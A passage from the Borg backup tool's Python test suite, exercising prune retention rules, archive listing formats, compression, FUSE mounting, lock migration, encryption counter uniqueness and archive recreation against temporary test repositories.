for i in range(1, 15):
assert re.search(r'Keeping archive \(rule: daily #' + str(i) + r'\):\s+test' + ("%02d" % (22-i)), output)
output = self.cmd('list', self.repository_location)
# Nothing pruned after dry run
for i in range(1, 25):
self.assert_in('test%02d' % i, output)
self.cmd('prune', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
output = self.cmd('list', self.repository_location)
# All matching backups plus oldest kept
for i in range(1, 22):
self.assert_in('test%02d' % i, output)
# Other backups have been pruned
for i in range(22, 25):
self.assert_not_in('test%02d' % i, output)
# With an initial and daily backup, prune daily until oldest is replaced by a monthly backup
def test_prune_retain_and_expire_oldest(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Initial backup
self._create_archive_ts('original_archive', 2020, 9, 1, 11, 15)
# Archive and prune daily for 30 days
for i in range(1, 31):
self._create_archive_ts('september%02d' % i, 2020, 9, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Archive and prune 6 days into the next month
for i in range(1, 7):
self._create_archive_ts('october%02d' % i, 2020, 10, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Oldest backup is still retained
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly\[oldest\] #1' + r'\):\s+original_archive', output)
# Archive one more day and prune.
self._create_archive_ts('october07', 2020, 10, 7, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Last day of previous month is retained as monthly, and oldest is expired.
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly #1\):\s+september30', output)
self.assert_not_in('original_archive', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=1')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
def test_prune_repository_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--prefix=foo-')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
output = self.cmd('list', self.repository_location)
self.assert_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--prefix=foo-')
output = self.cmd('list', self.repository_location)
self.assert_not_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
output = self.cmd('list', self.repository_location)
self.assert_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
output = self.cmd('list', self.repository_location)
self.assert_not_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
output_1 = self.cmd('list', self.repository_location)
output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
self.assertEqual(output_1, output_2)
output_1 = self.cmd('list', '--short', self.repository_location)
self.assertEqual(output_1, 'test-1\ntest-2\n')
output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
self.assertEqual(output_1, 'test-1/test-2/')
output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
self.assert_in('test-1 comment 1\n', output_3)
self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_consider_checkpoints(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test2.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
output = self.cmd('list', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" not in output
assert "test3.checkpoint.1" not in output
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" in output
assert "test3.checkpoint.1" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
def test_list_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
repository = list_repo['repository']
assert len(repository['id']) == 64
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert list_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in list_repo['encryption']
archive0 = list_repo['archives'][0]
assert datetime.strptime(archive0['time'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['size'] == 81920
assert datetime.strptime(file1['mtime'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
messages = {} # type -> message, one of each kind
for line in log.splitlines():
msg = json.loads(line)
messages[msg['type']] = msg
file_status = messages['file_status']
assert 'status' in file_status
assert file_status['path'].startswith('input')
log_message = messages['log_message']
assert isinstance(log_message['time'], float)
assert log_message['levelname'] == 'DEBUG' # there should only be DEBUG messages
assert isinstance(log_message['message'], str)
def test_debug_profile(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
stats = pstats.Stats('create.pyprof')
stats.strip_dirs()
stats.sort_stats('cumtime')
self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
stats = pstats.Stats('create.pyprof') # Only do this on trusted data!
stats.strip_dirs()
stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_zstd_compressible(self):
size, csize = self._get_sizes('zstd', compressible=True)
assert csize < size * 0.1
def test_compression_zstd_uncompressible(self):
size, csize = self._get_sizes('zstd', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_change_passphrase(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
# here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
self.cmd('key', 'change-passphrase', self.repository_location)
os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
os.close(os.open(some_file, flags_noatime))
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_test_files()
have_noatime = has_noatime('input/file1')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
os.remove(os.path.join('input', 'flagfile'))
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
with self.fuse_mount(self.repository_location, mountpoint):
# flags are not supported by the FUSE mount
# we also ignore xattrs here, they are tested separately
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
ignore_flags=True, ignore_xattrs=True)
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
ignore_flags=True, ignore_xattrs=True)
# mount only 1 archive, its contents shall show up directly in mountpoint:
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
ignore_flags=True, ignore_xattrs=True)
# regular file
in_fn = 'input/file1'
out_fn = os.path.join(mountpoint, 'input', 'file1')
# stat
sti1 = os.stat(in_fn)
sto1 = os.stat(out_fn)
assert sti1.st_mode == sto1.st_mode
assert sti1.st_uid == sto1.st_uid
assert sti1.st_gid == sto1.st_gid
assert sti1.st_size == sto1.st_size
if have_noatime:
assert sti1.st_atime == sto1.st_atime
assert sti1.st_ctime == sto1.st_ctime
assert sti1.st_mtime == sto1.st_mtime
if are_hardlinks_supported():
# note: there is another hardlink to this, see below
assert sti1.st_nlink == sto1.st_nlink == 2
# read
with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
assert in_f.read() == out_f.read()
# hardlink (to 'input/file1')
if are_hardlinks_supported():
in_fn = 'input/hardlink'
out_fn = os.path.join(mountpoint, 'input', 'hardlink')
sti2 = os.stat(in_fn)
sto2 = os.stat(out_fn)
assert sti2.st_nlink == sto2.st_nlink == 2
assert sto1.st_ino == sto2.st_ino
# symlink
if are_symlinks_supported():
in_fn = 'input/link1'
out_fn = os.path.join(mountpoint, 'input', 'link1')
sti = os.stat(in_fn, follow_symlinks=False)
sto = os.stat(out_fn, follow_symlinks=False)
assert sti.st_size == len('somewhere')
assert sto.st_size == len('somewhere')
assert stat.S_ISLNK(sti.st_mode)
assert stat.S_ISLNK(sto.st_mode)
assert os.readlink(in_fn) == os.readlink(out_fn)
# FIFO
if are_fifos_supported():
out_fn = os.path.join(mountpoint, 'input', 'fifo1')
sto = os.stat(out_fn)
assert stat.S_ISFIFO(sto.st_mode)
# list/read xattrs
try:
in_fn = 'input/fusexattr'
out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
assert xattr.getxattr(out_fn, b'user.empty') == b''
else:
assert no_selinux(xattr.listxattr(out_fn)) == []
try:
xattr.getxattr(out_fn, b'user.foo')
except OSError as e:
assert e.errno == llfuse.ENOATTR
else:
assert False, "expected OSError(ENOATTR), but no error was raised"
except OSError as err:
if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
# some systems have no xattr support on FUSE
pass
else:
raise
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive')
# Get rid of a chunk and repair it
archive, repository = self.open_archive('archive')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
path = item.path # store full path for later
break
else:
assert False # missed the file
repository.commit(compact=False)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
with pytest.raises(OSError) as excinfo:
open(os.path.join(mountpoint, path))
assert excinfo.value.errno == errno.EIO
with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_migrate_lock_alive(self):
"""Both old_id and new_id must not be stale during lock migration / daemonization."""
from functools import wraps
import pickle
import traceback
# Check results are communicated from the borg mount background process
# to the pytest process by means of a serialized dict object stored in this file.
assert_data_file = os.path.join(self.tmpdir, 'migrate_lock_assert_data.pickle')
# Decorates Lock.migrate_lock() with process_alive() checks before and after.
# (We don't want to mix testing code into runtime.)
def write_assert_data(migrate_lock):
@wraps(migrate_lock)
def wrapper(self, old_id, new_id):
wrapper.num_calls += 1
assert_data = {
'num_calls': wrapper.num_calls,
'old_id': old_id,
'new_id': new_id,
'before': {
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)},
'exception': None,
'exception.extr_tb': None,
'after': {
'old_id_alive': None,
'new_id_alive': None}}
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
try:
return migrate_lock(self, old_id, new_id)
except BaseException as e:
assert_data['exception'] = e
assert_data['exception.extr_tb'] = traceback.extract_tb(e.__traceback__)
finally:
assert_data['after'].update({
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)})
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
wrapper.num_calls = 0
return wrapper
# Decorate
borg.locking.Lock.migrate_lock = write_assert_data(borg.locking.Lock.migrate_lock)
try:
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('arch')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# In order that the decoration is kept for the borg mount process, we must not spawn, but actually fork;
# not to be confused with the forking in borg.helpers.daemonize() which is done as well.
with self.fuse_mount(self.repository_location, mountpoint, os_fork=True):
pass
with open(assert_data_file, 'rb') as _in:
assert_data = pickle.load(_in)
print('\nLock.migrate_lock(): assert_data = %r.' % (assert_data, ), file=sys.stderr, flush=True)
exception = assert_data['exception']
if exception is not None:
extracted_tb = assert_data['exception.extr_tb']
print(
'Lock.migrate_lock() raised an exception:\n',
'Traceback (most recent call last):\n',
*traceback.format_list(extracted_tb),
*traceback.format_exception(exception.__class__, exception, None),
sep='', end='', file=sys.stderr, flush=True)
assert assert_data['num_calls'] == 1, "Lock.migrate_lock() must be called exactly once."
assert exception is None, "Lock.migrate_lock() may not raise an exception."
assert_data_before = assert_data['before']
assert assert_data_before['old_id_alive'], "old_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert assert_data_before['new_id_alive'], "new_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert_data_after = assert_data['after']
assert assert_data_after['old_id_alive'], "old_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
assert assert_data_after['new_id_alive'], "new_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
finally:
# Undecorate
borg.locking.Lock.migrate_lock = borg.locking.Lock.migrate_lock.__wrapped__
def verify_aes_counter_uniqueness(self, method):
seen = set() # Chunks already seen
used = set() # counter values already used
def verify_uniqueness():
with Repository(self.repository_path) as repository:
for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
data = repository.get(id)
hash = sha256(data).digest()
if hash not in seen:
seen.add(hash)
num_blocks = num_cipher_blocks(len(data) - 41)
nonce = bytes_to_long(data[33:41])
for counter in range(nonce, nonce + num_blocks):
self.assert_not_in(counter, used)
used.add(counter)
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=' + method, self.repository_location)
verify_uniqueness()
self.cmd('create', self.repository_location + '::test', 'input')
verify_uniqueness()
self.cmd('create', self.repository_location + '::test.2', 'input')
verify_uniqueness()
self.cmd('delete', self.repository_location + '::test.2')
verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
data = b'some data'
hexkey = sha256(data).hexdigest()
self.create_regular_file('file', contents=data)
output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
assert hexkey in output
output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
assert hexkey in output
with open('output/file', 'rb') as f:
data_read = f.read()
assert data == data_read
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "deleted" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "not found" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
assert "is invalid" in output
def test_init_interrupt(self):
def raise_eof(*args):
raise EOFError
with patch.object(KeyfileKeyBase, 'create', raise_eof):
self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
else:
with pytest.raises(Repository.AlreadyExists):
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
# First run a regular borg check
self.cmd('check', self.repository_location)
# Then check that the cache on disk matches exactly what's in the repo.
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
original_chunks = cache.chunks
Cache.destroy(repository)
with Cache(repository, key, manifest) as cache:
correct_chunks = cache.chunks
assert original_chunks is not correct_chunks
seen = set()
for id, (refcount, size, csize) in correct_chunks.iteritems():
o_refcount, o_size, o_csize = original_chunks[id]
assert refcount == o_refcount
assert size == o_size
assert csize == o_csize
seen.add(id)
for id, (refcount, size, csize) in original_chunks.iteritems():
assert id in seen
def test_check_cache(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
cache.begin_txn()
cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
cache.commit()
with pytest.raises(AssertionError):
self.check_cache()
def test_recreate_target_rc(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
